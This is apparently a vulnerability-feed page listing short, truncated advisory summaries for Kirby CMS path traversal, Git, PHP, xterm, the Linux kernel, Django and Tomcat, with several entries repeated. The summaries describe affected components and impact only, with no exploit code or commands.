Kirby vulnerable to path traversal of snippet names in the `snippet()` helper

TL;DR This vulnerability affects all Kirby sites that use the snippet helper or $kirby-snippet method with a dynamic snippet name such as a snippet name that depends on request or user data. Sites that only use fixed calls to the snippet helper/$kirby-snippet method i.e. calls with a simple strin...

GHSA-X275-H9J4-7P4H Kirby vulnerable to path traversal of collection names during file system lookup

TL;DR This vulnerability affects all Kirby sites that use the collection helper or $kirby-collection method with a dynamic collection name such as a collection name that depends on request or user data. Sites that only use fixed calls to the collection helper/$kirby-collection method i.e. calls...

Kirby vulnerable to path traversal of collection names during file system lookup

TL;DR This vulnerability affects all Kirby sites that use the collection helper or $kirby-collection method with a dynamic collection name such as a collection name that depends on request or user data. Sites that only use fixed calls to the collection helper/$kirby-collection method i.e. calls...

git: The sideband payload is passed unfiltered to the terminal in git

A flaw was found in Git. When cloning, fetching, or pushing from a server, informational or error messages are transported from the remote Git process to the client via a sideband channel. These messages are prefixed with "remote:" and printed directly to the standard error output. Typically, thi...

Directory Traversal

Overview Affected versions of this package are vulnerable to Directory Traversal due to the improper handling of dynamic collection names in the collection helper or $kirby-collection method. An attacker can execute arbitrary PHP code and access sensitive files on the server by manipulating the...

Directory Traversal

Overview Affected versions of this package are vulnerable to Directory Traversal via the snippet helper or $kirby-snippet method with a dynamic snippet name. An attacker can access arbitrary files by manipulating the snippet path to traverse to directories outside of the intended snippet's root...

Directory Traversal

Overview Affected versions of this package are vulnerable to Directory Traversal via a missing check in the router implementation. An attacker can navigate and determine the existence of files on the server using special elements such as .. and / separators. Details A Directory Traversal attack...

php: Single byte overread with convert.quoted-printable-decode filter

A memory-related vulnerability was found in PHP’s filter handling system, particularly when processing input with convert.quoted-printable-decode filters. This issue can lead to a segmentation fault. This vulnerability is triggered through specific sequences of input data, causing PHP to crash...

xterm: code execution via OSC 50 input sequences

A flaw was found in xterm. This issue may allow code execution via font ops...

Low: Red Hat Security Advisory: xterm security update

An update for xterm is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE...

git: The sideband payload is passed unfiltered to the terminal in git

A flaw was found in Git. When cloning, fetching, or pushing from a server, informational or error messages are transported from the remote Git process to the client via a sideband channel. These messages are prefixed with "remote:" and printed directly to the standard error output. Typically, thi...

php: Single byte overread with convert.quoted-printable-decode filter

A memory-related vulnerability was found in PHP’s filter handling system, particularly when processing input with convert.quoted-printable-decode filters. This issue can lead to a segmentation fault. This vulnerability is triggered through specific sequences of input data, causing PHP to crash...

kernel: bpf: Fix too early release of tcx_entry

A flaw was found in the Linux kernel in which certain sequences of network namespace activity can cause a use-after-free, resulting in a denial of service...

Huawei EulerOS: Security Advisory for git (EulerOS-SA-2025-1513)

The remote host is missing an update for the Huawei EulerOS SPDX-FileCopyrightText: 2025 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Python Library Django 4.2.x < 4.2.21 / 5.1.x < 5.1.9 / 5.2.x < 5.2.1 DoS

The detected version of the Django Python package, Django, is 4.2.x prior to 4.2.21 or 5.1.x prior to 5.1.9 or 5.2.x prior to 5.2.1. It is, therefore, affected by a denial of service vulnerability as disclosed in Django's May 7th 2025 security advisory. The django.utils.html.striptags function is...

ALSA-2025:7427 Low: xterm security update

The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. Security Fixes: xterm: code execution via OSC 50 input sequences CVE-2022-45063 For more details about the securi...

Important: tomcat9

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...

Important: tomcat9

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...

Important: tomcat10

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...

Important: tomcat10

Issue Overview: Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException...